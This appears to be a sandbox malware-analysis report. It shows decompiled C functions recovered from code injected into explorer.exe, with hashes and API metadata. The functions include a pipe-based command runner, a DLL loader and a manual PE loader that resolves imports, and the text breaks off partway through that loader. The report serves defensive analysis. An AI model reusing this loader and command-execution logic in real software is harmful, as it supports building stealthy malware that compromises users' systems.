                                          C-Code - Quality: 79%
                                          			E000921FF(char* __eax, char** _a4, long long* _a8) {
                                          				char* _v8;
                                          				long long _v16;
                                          				char* _t9;
                                          				signed char _t11;
                                          				char** _t19;
                                          				char _t22;
                                          				long long _t32;
                                          				long long _t33;
                                          
                                          				_t9 = __eax;
                                          				L000922CD();
                                          				_t19 = _a4;
                                          				_t22 =  *__eax;
                                          				if( *_t22 != 0x2e) {
                                          					_t9 = strchr( *_t19, 0x2e);
                                          					if(_t9 != 0) {
                                          						 *_t9 =  *_t22;
                                          					}
                                          				}
                                          				L00092291();
                                          				 *_t9 =  *_t9 & 0x00000000;
                                          				_t11 = strtod( *_t19,  &_v8);
                                          				asm("fst qword [ebp-0xc]");
                                          				_t32 =  *0x98250;
                                          				asm("fucomp st1");
                                          				asm("fnstsw ax");
                                          				if((_t11 & 0x00000044) != 0) {
                                          					L5:
                                          					st0 = _t32;
                                          					L00092291();
                                          					if( *_t11 != 0x22) {
                                          						_t33 = _v16;
                                          						goto L8;
                                          					} else {
                                          						return _t11 | 0xffffffff;
                                          					}
                                          				} else {
                                          					_t33 =  *0x98258;
                                          					asm("fucomp st1");
                                          					asm("fnstsw ax");
                                          					if((_t11 & 0x00000044) != 0) {
                                          						L8:
                                          						 *_a8 = _t33;
                                          						return 0;
                                          					} else {
                                          						goto L5;
                                          					}
                                          				}
                                          			}

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _errno$localeconvstrchrstrtod
                                          • String ID:
                                          • API String ID: 1035490122-0
                                          • Opcode ID: de4c433de47fb25370494944294a547a5aa963e4291e7017832a2afbf295a471
                                          • Instruction ID: 9be57ecffa989f7d2828815fae2d17a9d7f4e019258d81125002a8d3572c8328
                                          • Opcode Fuzzy Hash: de4c433de47fb25370494944294a547a5aa963e4291e7017832a2afbf295a471
                                          • Instruction Fuzzy Hash: 7701F239904205FADF127F24E9057DD7BA8AF4B360F2041D1E9D0A61E2DB759854E7A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 73%
                                          			E0008A9B7(signed int __ecx) {
                                          				void* _v8;
                                          				void* _v12;
                                          				void* _v16;
                                          				void* _v20;
                                          				signed int _v24;
                                          				char _v28;
                                          				char _v32;
                                          				char _v36;
                                          				struct _SECURITY_ATTRIBUTES _v48;
                                          				intOrPtr _v60;
                                          				char _v64;
                                          				intOrPtr _v76;
                                          				intOrPtr _v80;
                                          				void* _v84;
                                          				short _v92;
                                          				intOrPtr _v96;
                                          				void _v140;
                                          				intOrPtr _t77;
                                          				void* _t79;
                                          				intOrPtr _t85;
                                          				intOrPtr _t87;
                                          				intOrPtr _t89;
                                          				intOrPtr _t92;
                                          				intOrPtr _t98;
                                          				intOrPtr _t100;
                                          				intOrPtr _t102;
                                          				long _t111;
                                          				intOrPtr _t115;
                                          				intOrPtr _t126;
                                          				void* _t127;
                                          				void* _t128;
                                          				void* _t129;
                                          				void* _t130;
                                          
                                          				_t111 = 0;
                                          				_v24 = __ecx;
                                          				_v12 = 0;
                                          				_v20 = 0;
                                          				_t127 = 0;
                                          				_v8 = 0;
                                          				_v16 = 0;
                                          				_v48.nLength = 0xc;
                                          				_v48.lpSecurityDescriptor = 0;
                                          				_v48.bInheritHandle = 1;
                                          				_v28 = 0;
                                          				memset( &_v140, 0, 0x44);
                                          				asm("stosd");
                                          				_t130 = _t129 + 0xc;
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				if(CreatePipe( &_v12,  &_v20,  &_v48, 0) == 0) {
                                          					L18:
                                          					return 0;
                                          				}
                                          				if(CreatePipe( &_v8,  &_v16,  &_v48, 0) == 0) {
                                          					L13:
                                          					E0008861A( &_v28, 0);
                                          					if(_v20 != 0) {
                                          						_t77 =  *0x9e684; // 0x34f8f0
                                          						 *((intOrPtr*)(_t77 + 0x30))(_v20);
                                          					}
                                          					if(_v8 != 0) {
                                          						_t115 =  *0x9e684; // 0x34f8f0
                                          						 *((intOrPtr*)(_t115 + 0x30))(_v8);
                                          					}
                                          					return _t111;
                                          				}
                                          				_t79 = _v16;
                                          				_v76 = _t79;
                                          				_v80 = _t79;
                                          				_v84 = _v12;
                                          				_v140 = 0x44;
                                          				_v96 = 0x101;
                                          				_v92 = 0;
                                          				_t126 = E00088604(0x1001);
                                          				_v28 = _t126;
                                          				if(_t126 == 0) {
                                          					goto L18;
                                          				}
                                          				_push( &_v64);
                                          				_push( &_v140);
                                          				_t85 =  *0x9e684; // 0x34f8f0
                                          				_push(0);
                                          				_push(0);
                                          				_push(0x8000000);
                                          				_push(1);
                                          				_push(0);
                                          				_push(0);
                                          				_push(_v24);
                                          				_push(0);
                                          				if( *((intOrPtr*)(_t85 + 0x38))() == 0) {
                                          					goto L13;
                                          				}
                                          				_t87 =  *0x9e684; // 0x34f8f0
                                          				 *((intOrPtr*)(_t87 + 0x30))(_v12);
                                          				_t89 =  *0x9e684; // 0x34f8f0
                                          				 *((intOrPtr*)(_t89 + 0x30))(_v16);
                                          				_v24 = _v24 & 0;
                                          				do {
                                          					_t92 =  *0x9e684; // 0x34f8f0
                                          					_v36 =  *((intOrPtr*)(_t92 + 0x88))(_v8, _t126, 0x1000,  &_v24, 0);
                                          					 *((char*)(_v24 + _t126)) = 0;
                                          					if(_t111 == 0) {
                                          						_t127 = E000891A6(_t126, 0);
                                          					} else {
                                          						_push(0);
                                          						_push(_t126);
                                          						_v32 = _t127;
                                          						_t127 = E00089292(_t127);
                                          						E0008861A( &_v32, 0xffffffff);
                                          						_t130 = _t130 + 0x14;
                                          					}
                                          					_t111 = _t127;
                                          					_v32 = _t127;
                                          				} while (_v36 != 0);
                                          				_push( &_v36);
                                          				_push(E0008C379(_t127));
                                          				_t98 =  *0x9e68c; // 0x34fab8
                                          				_push(_t127);
                                          				if( *((intOrPtr*)(_t98 + 0xb8))() != 0) {
                                          					L12:
                                          					_t100 =  *0x9e684; // 0x34f8f0
                                          					 *((intOrPtr*)(_t100 + 0x30))(_v64);
                                          					_t102 =  *0x9e684; // 0x34f8f0
                                          					 *((intOrPtr*)(_t102 + 0x30))(_v60);
                                          					goto L13;
                                          				}
                                          				_t128 = E00089256(_t127);
                                          				if(_t128 == 0) {
                                          					goto L12;
                                          				}
                                          				E0008861A( &_v32, 0);
                                          				return _t128;
                                          			}

                                          APIs
                                          • memset.MSVCRT ref: 0008A9F4
                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,00000000,00000000), ref: 0008AA18
                                          • CreatePipe.KERNEL32(000865A9,?,0000000C,00000000), ref: 0008AA2F
                                            • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                                            • Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateHeapPipe$AllocateFreememset
                                          • String ID: D
                                          • API String ID: 2365139273-2746444292
                                          • Opcode ID: 6f0b75088f2de3f72156e0999c4a814b79d37797bc9ee56fa71e6c034334ef96
                                          • Instruction ID: 1038731307509bc63423b83b895d9a6edc7a8df2068bd220f00375d18a9fab8d
                                          • Opcode Fuzzy Hash: 6f0b75088f2de3f72156e0999c4a814b79d37797bc9ee56fa71e6c034334ef96
                                          • Instruction Fuzzy Hash: 3A512C72E00209AFEB51EFA4CC45FDEBBB9BB08300F14416AF544E7152EB7499048B61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 89%
                                          			E0008C4CE(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                          				char _v8;
                                          				char _v12;
                                          				void _v140;
                                          				signed char _t14;
                                          				char _t15;
                                          				intOrPtr _t20;
                                          				void* _t25;
                                          				intOrPtr _t26;
                                          				intOrPtr _t32;
                                          				WCHAR* _t34;
                                          				intOrPtr _t35;
                                          				struct HINSTANCE__* _t37;
                                          				int _t38;
                                          				intOrPtr _t46;
                                          				void* _t47;
                                          				intOrPtr _t50;
                                          				void* _t60;
                                          				void* _t61;
                                          				char _t62;
                                          				char* _t63;
                                          				void* _t65;
                                          				intOrPtr _t66;
                                          				char _t68;
                                          
                                          				_t65 = __esi;
                                          				_t61 = __edi;
                                          				_t47 = __ebx;
                                          				_t50 =  *0x9e688; // 0xb0000
                                          				_t14 =  *(_t50 + 0x1898);
                                          				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
                                          					_t15 = E000895E1(_t50, 0xb62);
                                          					_t66 =  *0x9e688; // 0xb0000
                                          					_t62 = _t15;
                                          					_t67 = _t66 + 0xb0;
                                          					_v8 = _t62;
                                          					E00089640( &_v140, 0x40, L"%08x", E0008D400(_t66 + 0xb0, E0008C379(_t66 + 0xb0), 0));
                                          					_t20 =  *0x9e688; // 0xb0000
                                          					asm("sbb eax, eax");
                                          					_t25 = E000895E1(_t67, ( ~( *(_t20 + 0xa8)) & 0x00000068) + 0x615);
                                          					_t63 = "\\";
                                          					_t26 =  *0x9e688; // 0xb0000
                                          					_t68 = E000892E5(_t26 + 0x1020);
                                          					_v12 = _t68;
                                          					E000885D5( &_v8);
                                          					_t32 =  *0x9e688; // 0xb0000
                                          					_t34 = E000892E5(_t32 + 0x122a);
                                          					 *0x9e784 = _t34;
                                          					_t35 =  *0x9e684; // 0x34f8f0
                                          					 *((intOrPtr*)(_t35 + 0x110))(_t68, _t34, 0, _t63,  &_v140, ".", L"dll", 0, _t63, _t25, _t63, _t62, 0, _t61, _t65, _t47);
                                          					_t37 = LoadLibraryW( *0x9e784);
                                          					 *0x9e77c = _t37;
                                          					if(_t37 == 0) {
                                          						_t38 = 0;
                                          					} else {
                                          						_push(_t37);
                                          						_t60 = 0x28;
                                          						_t38 = E0008E171(0x9bb48, _t60);
                                          					}
                                          					 *0x9e780 = _t38;
                                          					E0008861A( &_v12, 0xfffffffe);
                                          					memset( &_v140, 0, 0x80);
                                          					if( *0x9e780 != 0) {
                                          						goto L10;
                                          					} else {
                                          						E0008861A(0x9e784, 0xfffffffe);
                                          						goto L8;
                                          					}
                                          				} else {
                                          					L8:
                                          					if( *0x9e780 == 0) {
                                          						_t46 =  *0x9e6bc; // 0x34fa18
                                          						 *0x9e780 = _t46;
                                          					}
                                          					L10:
                                          					return 1;
                                          				}
                                          			}

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LibraryLoadmemset
                                          • String ID: %08x$dll
                                          • API String ID: 3406617148-2963171978
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 99%
                                          			E00092D70(int _a4, signed int _a8) {
                                          				int _v8;
                                          				intOrPtr _v12;
                                          				signed int _v16;
                                          				void* __esi;
                                          				void* _t137;
                                          				signed int _t141;
                                          				intOrPtr* _t142;
                                          				signed int _t145;
                                          				signed int _t146;
                                          				intOrPtr _t151;
                                          				intOrPtr _t161;
                                          				intOrPtr _t162;
                                          				intOrPtr _t167;
                                          				intOrPtr _t170;
                                          				signed int _t172;
                                          				intOrPtr _t173;
                                          				int _t184;
                                          				intOrPtr _t185;
                                          				intOrPtr _t188;
                                          				signed int _t189;
                                          				void* _t195;
                                          				int _t202;
                                          				int _t208;
                                          				intOrPtr _t217;
                                          				signed int _t218;
                                          				int _t219;
                                          				intOrPtr _t220;
                                          				signed int _t221;
                                          				signed int _t222;
                                          				int _t224;
                                          				int _t225;
                                          				signed int _t227;
                                          				intOrPtr _t228;
                                          				int _t232;
                                          				int _t234;
                                          				signed int _t235;
                                          				int _t239;
                                          				void* _t240;
                                          				int _t245;
                                          				int _t252;
                                          				signed int _t253;
                                          				int _t254;
                                          				void* _t257;
                                          				void* _t258;
                                          				int _t259;
                                          				intOrPtr _t260;
                                          				int _t261;
                                          				signed int _t269;
                                          				signed int _t271;
                                          				intOrPtr* _t272;
                                          				void* _t273;
                                          
                                          				_t253 = _a8;
                                          				_t272 = _a4;
                                          				_t3 = _t272 + 0xc; // 0x452bf84d
                                          				_t4 = _t272 + 0x2c; // 0x8df075ff
                                          				_t228 =  *_t4;
                                          				_t137 =  *_t3 + 0xfffffffb;
                                          				_t229 =  <=  ? _t137 : _t228;
                                          				_v16 =  <=  ? _t137 : _t228;
                                          				_t269 = 0;
                                          				_a4 =  *((intOrPtr*)( *_t272 + 4));
                                          				asm("o16 nop [eax+eax]");
                                          				while(1) {
                                          					_t8 = _t272 + 0x16bc; // 0x8b3c7e89
                                          					_t141 =  *_t8 + 0x2a >> 3;
                                          					_v12 = 0xffff;
                                          					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
                                          					if(_t217 < _t141) {
                                          						break;
                                          					}
                                          					_t11 = _t272 + 0x6c; // 0xa1ec8b55
                                          					_t12 = _t272 + 0x5c; // 0x84e85000
                                          					_t245 =  *_t11 -  *_t12;
                                          					_v8 = _t245;
                                          					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
                                          					_t247 =  <  ? _t195 : _v12;
                                          					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
                                          					if(_t227 >= _v16) {
                                          						L7:
                                          						if(_t253 != 4) {
                                          							L10:
                                          							_t269 = 0;
                                          							__eflags = 0;
                                          						} else {
                                          							_t285 = _t227 - _t195;
                                          							if(_t227 != _t195) {
                                          								goto L10;
                                          							} else {
                                          								_t269 = _t253 - 3;
                                          							}
                                          						}
                                          						E00095D90(_t272, _t272, 0, 0, _t269);
                                          						_t18 = _t272 + 0x14; // 0xc703f045
                                          						_t19 = _t272 + 8; // 0x8d000040
                                          						 *( *_t18 +  *_t19 - 4) = _t227;
                                          						_t22 = _t272 + 0x14; // 0xc703f045
                                          						_t23 = _t272 + 8; // 0x8d000040
                                          						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
                                          						_t26 = _t272 + 0x14; // 0xc703f045
                                          						_t27 = _t272 + 8; // 0x8d000040
                                          						 *( *_t26 +  *_t27 - 2) =  !_t227;
                                          						_t30 = _t272 + 0x14; // 0xc703f045
                                          						_t31 = _t272 + 8; // 0x8d000040
                                          						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
                                          						E00094AF0(_t285,  *_t272);
                                          						_t202 = _v8;
                                          						_t273 = _t273 + 0x14;
                                          						if(_t202 != 0) {
                                          							_t208 =  >  ? _t227 : _t202;
                                          							_v8 = _t208;
                                          							_t36 = _t272 + 0x38; // 0xf47d8bff
                                          							_t37 = _t272 + 0x5c; // 0x84e85000
                                          							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
                                          							_t273 = _t273 + 0xc;
                                          							_t252 = _v8;
                                          							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
                                          							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
                                          							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
                                          							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
                                          							_t227 = _t227 - _t252;
                                          						}
                                          						if(_t227 != 0) {
                                          							E00094C30( *_t272,  *( *_t272 + 0xc), _t227);
                                          							_t273 = _t273 + 0xc;
                                          							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
                                          							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
                                          							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
                                          						}
                                          						_t253 = _a8;
                                          						if(_t269 == 0) {
                                          							continue;
                                          						}
                                          					} else {
                                          						if(_t227 != 0 || _t253 == 4) {
                                          							if(_t253 != 0 && _t227 == _t195) {
                                          								goto L7;
                                          							}
                                          						}
                                          					}
                                          					break;
                                          				}
                                          				_t142 =  *_t272;
                                          				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
                                          				_a4 = _t232;
                                          				if(_t232 == 0) {
                                          					_t83 = _t272 + 0x6c; // 0xa1ec8b55
                                          					_t254 =  *_t83;
                                          				} else {
                                          					_t59 = _t272 + 0x2c; // 0x8df075ff
                                          					_t224 =  *_t59;
                                          					if(_t232 < _t224) {
                                          						_t65 = _t272 + 0x3c; // 0x830cc483
                                          						_t66 = _t272 + 0x6c; // 0xa1ec8b55
                                          						_t260 =  *_t66;
                                          						__eflags =  *_t65 - _t260 - _t232;
                                          						if( *_t65 - _t260 <= _t232) {
                                          							_t67 = _t272 + 0x38; // 0xf47d8bff
                                          							_t261 = _t260 - _t224;
                                          							 *(_t272 + 0x6c) = _t261;
                                          							memcpy( *_t67,  *_t67 + _t224, _t261);
                                          							_t70 = _t272 + 0x16b0; // 0xdf750008
                                          							_t188 =  *_t70;
                                          							_t273 = _t273 + 0xc;
                                          							_t232 = _a4;
                                          							__eflags = _t188 - 2;
                                          							if(_t188 < 2) {
                                          								_t189 = _t188 + 1;
                                          								__eflags = _t189;
                                          								 *(_t272 + 0x16b0) = _t189;
                                          							}
                                          						}
                                          						_t73 = _t272 + 0x38; // 0xf47d8bff
                                          						_t74 = _t272 + 0x6c; // 0xa1ec8b55
                                          						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
                                          						_t225 = _a4;
                                          						_t273 = _t273 + 0xc;
                                          						_t76 = _t272 + 0x6c;
                                          						 *_t76 =  *(_t272 + 0x6c) + _t225;
                                          						__eflags =  *_t76;
                                          						_t78 = _t272 + 0x6c; // 0xa1ec8b55
                                          						_t184 =  *_t78;
                                          						_t79 = _t272 + 0x2c; // 0x8df075ff
                                          						_t239 =  *_t79;
                                          					} else {
                                          						 *(_t272 + 0x16b0) = 2;
                                          						_t61 = _t272 + 0x38; // 0xf47d8bff
                                          						memcpy( *_t61,  *_t142 - _t224, _t224);
                                          						_t62 = _t272 + 0x2c; // 0x8df075ff
                                          						_t184 =  *_t62;
                                          						_t273 = _t273 + 0xc;
                                          						_t225 = _a4;
                                          						_t239 = _t184;
                                          						 *(_t272 + 0x6c) = _t184;
                                          					}
                                          					_t254 = _t184;
                                          					 *(_t272 + 0x5c) = _t184;
                                          					_t81 = _t272 + 0x16b4; // 0xe9ffcb83
                                          					_t185 =  *_t81;
                                          					_t240 = _t239 - _t185;
                                          					_t241 =  <=  ? _t225 : _t240;
                                          					_t242 = ( <=  ? _t225 : _t240) + _t185;
                                          					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
                                          				}
                                          				if( *(_t272 + 0x16c0) < _t254) {
                                          					 *(_t272 + 0x16c0) = _t254;
                                          				}
                                          				if(_t269 == 0) {
                                          					_t218 = _a8;
                                          					__eflags = _t218;
                                          					if(_t218 == 0) {
                                          						L34:
                                          						_t89 = _t272 + 0x3c; // 0x830cc483
                                          						_t219 =  *_t272;
                                          						_t145 =  *_t89 - _t254 - 1;
                                          						_a4 =  *_t272;
                                          						_t234 = _t254;
                                          						_v16 = _t145;
                                          						_v8 = _t254;
                                          						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
                                          						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
                                          							_v8 = _t254;
                                          							_t95 = _t272 + 0x5c; // 0x84e85000
                                          							_a4 = _t219;
                                          							_t234 = _t254;
                                          							_t97 = _t272 + 0x2c; // 0x8df075ff
                                          							__eflags =  *_t95 -  *_t97;
                                          							if( *_t95 >=  *_t97) {
                                          								_t98 = _t272 + 0x2c; // 0x8df075ff
                                          								_t167 =  *_t98;
                                          								_t259 = _t254 - _t167;
                                          								_t99 = _t272 + 0x38; // 0xf47d8bff
                                          								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
                                          								 *(_t272 + 0x6c) = _t259;
                                          								memcpy( *_t99, _t167 +  *_t99, _t259);
                                          								_t103 = _t272 + 0x16b0; // 0xdf750008
                                          								_t170 =  *_t103;
                                          								_t273 = _t273 + 0xc;
                                          								__eflags = _t170 - 2;
                                          								if(_t170 < 2) {
                                          									_t172 = _t170 + 1;
                                          									__eflags = _t172;
                                          									 *(_t272 + 0x16b0) = _t172;
                                          								}
                                          								_t106 = _t272 + 0x2c; // 0x8df075ff
                                          								_t145 = _v16 +  *_t106;
                                          								__eflags = _t145;
                                          								_a4 =  *_t272;
                                          								_t108 = _t272 + 0x6c; // 0xa1ec8b55
                                          								_t234 =  *_t108;
                                          								_v8 = _t234;
                                          							}
                                          						}
                                          						_t255 = _a4;
                                          						_t220 =  *((intOrPtr*)(_a4 + 4));
                                          						__eflags = _t145 - _t220;
                                          						_t221 =  <=  ? _t145 : _t220;
                                          						_t146 = _t221;
                                          						_a4 = _t221;
                                          						_t222 = _a8;
                                          						__eflags = _t146;
                                          						if(_t146 != 0) {
                                          							_t114 = _t272 + 0x38; // 0xf47d8bff
                                          							E00094C30(_t255,  *_t114 + _v8, _t146);
                                          							_t273 = _t273 + 0xc;
                                          							_t117 = _t272 + 0x6c;
                                          							 *_t117 =  *(_t272 + 0x6c) + _a4;
                                          							__eflags =  *_t117;
                                          							_t119 = _t272 + 0x6c; // 0xa1ec8b55
                                          							_t234 =  *_t119;
                                          						}
                                          						__eflags =  *(_t272 + 0x16c0) - _t234;
                                          						if( *(_t272 + 0x16c0) < _t234) {
                                          							 *(_t272 + 0x16c0) = _t234;
                                          						}
                                          						_t122 = _t272 + 0x16bc; // 0x8b3c7e89
                                          						_t123 = _t272 + 0xc; // 0x452bf84d
                                          						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
                                          						__eflags = _t257 - 0xffff;
                                          						_t258 =  >  ? 0xffff : _t257;
                                          						_t124 = _t272 + 0x2c; // 0x8df075ff
                                          						_t151 =  *_t124;
                                          						_t125 = _t272 + 0x5c; // 0x84e85000
                                          						_t235 = _t234 -  *_t125;
                                          						__eflags = _t258 - _t151;
                                          						_t152 =  <=  ? _t258 : _t151;
                                          						__eflags = _t235 - ( <=  ? _t258 : _t151);
                                          						if(_t235 >= ( <=  ? _t258 : _t151)) {
                                          							L49:
                                          							__eflags = _t235 - _t258;
                                          							_t154 =  >  ? _t258 : _t235;
                                          							_a4 =  >  ? _t258 : _t235;
                                          							__eflags = _t222 - 4;
                                          							if(_t222 != 4) {
                                          								L53:
                                          								_t269 = 0;
                                          								__eflags = 0;
                                          							} else {
                                          								_t161 =  *_t272;
                                          								__eflags =  *(_t161 + 4);
                                          								_t154 = _a4;
                                          								if( *(_t161 + 4) != 0) {
                                          									goto L53;
                                          								} else {
                                          									__eflags = _t154 - _t235;
                                          									if(_t154 != _t235) {
                                          										goto L53;
                                          									} else {
                                          										_t269 = _t222 - 3;
                                          									}
                                          								}
                                          							}
                                          							_t131 = _t272 + 0x38; // 0xf47d8bff
                                          							_t132 = _t272 + 0x5c; // 0x84e85000
                                          							E00095D90(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
                                          							_t134 = _t272 + 0x5c;
                                          							 *_t134 =  *(_t272 + 0x5c) + _a4;
                                          							__eflags =  *_t134;
                                          							E00094AF0( *_t134,  *_t272);
                                          						} else {
                                          							__eflags = _t235;
                                          							if(_t235 != 0) {
                                          								L46:
                                          								__eflags = _t222;
                                          								if(_t222 != 0) {
                                          									_t162 =  *_t272;
                                          									__eflags =  *(_t162 + 4);
                                          									if( *(_t162 + 4) == 0) {
                                          										__eflags = _t235 - _t258;
                                          										if(_t235 <= _t258) {
                                          											goto L49;
                                          										}
                                          									}
                                          								}
                                          							} else {
                                          								__eflags = _t222 - 4;
                                          								if(_t222 == 4) {
                                          									goto L46;
                                          								}
                                          							}
                                          						}
                                          						asm("sbb edi, edi");
                                          						_t271 =  ~_t269 & 0x00000002;
                                          						__eflags = _t271;
                                          						return _t271;
                                          					} else {
                                          						__eflags = _t218 - 4;
                                          						if(_t218 == 4) {
                                          							goto L34;
                                          						} else {
                                          							_t173 =  *_t272;
                                          							__eflags =  *(_t173 + 4);
                                          							if( *(_t173 + 4) != 0) {
                                          								goto L34;
                                          							} else {
                                          								_t88 = _t272 + 0x5c; // 0x84e85000
                                          								__eflags = _t254 -  *_t88;
                                          								if(_t254 !=  *_t88) {
                                          									goto L34;
                                          								} else {
                                          									return 1;
                                          								}
                                          							}
                                          						}
                                          					}
                                          				} else {
                                          					return 3;
                                          				}
                                          			}























































                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: memcpy
                                          • String ID:
                                          • API String ID: 3510742995-0
                                          • Opcode ID: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
                                          • Instruction ID: 185e7931b200b5f00758bf730992471f6333a59919987fd71983e5a0ce0181f8
                                          • Opcode Fuzzy Hash: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
                                          • Instruction Fuzzy Hash: 74D11271A00B049FCB68CF69D8D4AAAB7F1FF88304B24892DE88AC7741D771E9449B54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 52%
                                          			E00092AEC(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                          				signed int _v5;
                                          				signed short _v12;
                                          				intOrPtr* _v16;
                                          				signed int* _v20;
                                          				intOrPtr _v24;
                                          				unsigned int _v28;
                                          				signed short* _v32;
                                          				struct HINSTANCE__* _v36;
                                          				intOrPtr* _v40;
                                          				signed short* _v44;
                                          				intOrPtr _v48;
                                          				unsigned int _v52;
                                          				intOrPtr _v56;
                                          				_Unknown_base(*)()* _v60;
                                          				signed int _v64;
                                          				intOrPtr _v68;
                                          				intOrPtr _v72;
                                          				unsigned int _v76;
                                          				intOrPtr _v80;
                                          				signed int _v84;
                                          				intOrPtr _v88;
                                          				signed int _t149;
                                          				void* _t189;
                                          				signed int _t194;
                                          				signed int _t196;
                                          				intOrPtr _t236;
                                          
                                          				_v72 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
                                          				_v24 = _v72;
                                          				_t236 = _a4 -  *((intOrPtr*)(_v24 + 0x34));
                                          				_v56 = _t236;
                                          				if(_t236 == 0) {
                                          					L13:
                                          					while(0 != 0) {
                                          					}
                                          					_push(8);
                                          					if( *((intOrPtr*)(_v24 + 0xbadc25)) == 0) {
                                          						L35:
                                          						_v68 =  *((intOrPtr*)(_v24 + 0x28)) + _a4;
                                          						while(0 != 0) {
                                          						}
                                          						if(_a12 != 0) {
                                          							 *_a12 = _v68;
                                          						}
                                          						 *((intOrPtr*)(_v24 + 0x34)) = _a4;
                                          						return _v68(_a4, 1, _a8);
                                          					}
                                          					_v84 = 0x80000000;
                                          					_t149 = 8;
                                          					_v16 = _a4 +  *((intOrPtr*)(_v24 + (_t149 << 0) + 0x78));
                                          					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
                                          						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
                                          						if(_v36 == 0) {
                                          							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
                                          						}
                                          						if(_v36 != 0) {
                                          							if( *_v16 == 0) {
                                          								_v20 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
                                          							} else {
                                          								_v20 =  *_v16 + _a4;
                                          							}
                                          							_v64 = _v64 & 0x00000000;
                                          							while( *_v20 != 0) {
                                          								if(( *_v20 & _v84) == 0) {
                                          									_v88 =  *_v20 + _a4;
                                          									_v60 = GetProcAddress(_v36, _v88 + 2);
                                          								} else {
                                          									_v60 = GetProcAddress(_v36,  *_v20 & 0x0000ffff);
                                          								}
                                          								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
                                          									 *_v20 = _v60;
                                          								} else {
                                          									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v64) = _v60;
                                          								}
                                          								_v20 =  &(_v20[1]);
                                          								_v64 = _v64 + 4;
                                          							}
                                          							_v16 = _v16 + 0x14;
                                          							continue;
                                          						} else {
                                          							_t189 = 0xfffffffd;
                                          							return _t189;
                                          						}
                                          					}
                                          					goto L35;
                                          				}
                                          				_t194 = 8;
                                          				_v44 = _a4 +  *((intOrPtr*)(_v24 + 0x78 + _t194 * 5));
                                          				_t196 = 8;
                                          				_v48 =  *((intOrPtr*)(_v24 + 0x7c + _t196 * 5));
                                          				while(0 != 0) {
                                          				}
                                          				while(_v48 > 0) {
                                          					_v28 = _v44[2];
                                          					_v48 = _v48 - _v28;
                                          					_v28 = _v28 - 8;
                                          					_v28 = _v28 >> 1;
                                          					_v32 =  &(_v44[4]);
                                          					_v80 = _a4 +  *_v44;
                                          					_v52 = _v28;
                                          					while(1) {
                                          						_v76 = _v52;
                                          						_v52 = _v52 - 1;
                                          						if(_v76 == 0) {
                                          							break;
                                          						}
                                          						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
